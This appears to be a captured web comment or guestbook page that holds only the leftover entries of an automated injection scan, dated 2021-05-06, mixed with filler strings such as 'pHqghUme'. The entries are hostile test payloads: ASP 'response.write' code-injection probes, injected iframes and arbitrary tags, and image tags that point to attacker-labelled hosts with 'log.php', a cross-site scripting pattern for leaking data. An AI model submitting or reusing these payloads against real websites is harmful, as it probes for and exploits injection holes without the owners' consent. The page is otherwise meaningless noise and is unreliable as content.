  2021-05-06 09:27:47


  1


 • pHqghUme

  2021-05-06 09:27:46


  1


 • pHqghUme

  2021-05-06 09:27:45


  "+response.write(9022434*9275292)+"


 • pHqghUme

  2021-05-06 09:27:44


  response.write(9022434*9275292)


 • pHqghUme

  2021-05-06 09:27:44


  '+response.write(9022434*9275292)+'


 • '+response.write(9723879*9292622)+'

  2021-05-06 09:27:43


  1


 • "+response.write(9723879*9292622)+"

  2021-05-06 09:27:43


  1


 • pHqghUme

  2021-05-06 09:27:42


  1


 • response.write(9723879*9292622)

  2021-05-06 09:27:42


  1


 • pHqghUme

  2021-05-06 09:27:41


  1


 • pHqghUme

  2021-05-06 09:27:40


  1


 • pHqghUme

  2021-05-06 09:27:40


  1


 • pHqghUme

  2021-05-06 09:27:39


  1


 • pHqghUme

  2021-05-06 09:27:39


  1


 • pHqghUme

  2021-05-06 09:23:40


  1


 • pHqghUme

  2021-05-06 09:23:25


  1


 • pHqghUme

  2021-05-06 09:23:14


  1BvQzVsH8EO


 • 1nfKY9y2tO

  2021-05-06 09:23:12


  1


 • pHqghUme

  2021-05-06 09:23:11


  1


 • pHqghUme

  2021-05-06 09:23:10


  1


 • pHqghUme

  2021-05-06 09:06:27


  1


 • pHqghUme<5nWctk<

  2021-05-06 05:28:49


  1


 • pHqghUme

  2021-05-06 05:28:45


  1<GpyVEX<


 • pHqghUme<img sRc='http://attacker-9657/log.php?

  2021-05-06 05:28:41


  1


 • pHqghUme

  2021-05-06 05:28:32


  1<img sRc='http://attacker-9380/log.php?


 • pHqghUme<0MJxLg x=9753>

  2021-05-06 05:28:30


  1


 • pHqghUme

  2021-05-06 05:28:22


  1<ptpjho x=9838>


 • pHqghUme<ifRAme sRc=9420.com></IfRamE>

  2021-05-06 05:28:20


  1


 • pHqghUme

  2021-05-06 05:28:13


  1<ifRAme sRc=9905.com></IfRamE>


 • pHqghUme<WAHCCN>HJBQI[!+!]</WAHCCN>

  2021-05-06 05:28:07


  1


 • pHqghUme

  2021-05-06 05:28:04


  1<WXMXTH>ARVSC[!+!]</WXMXTH>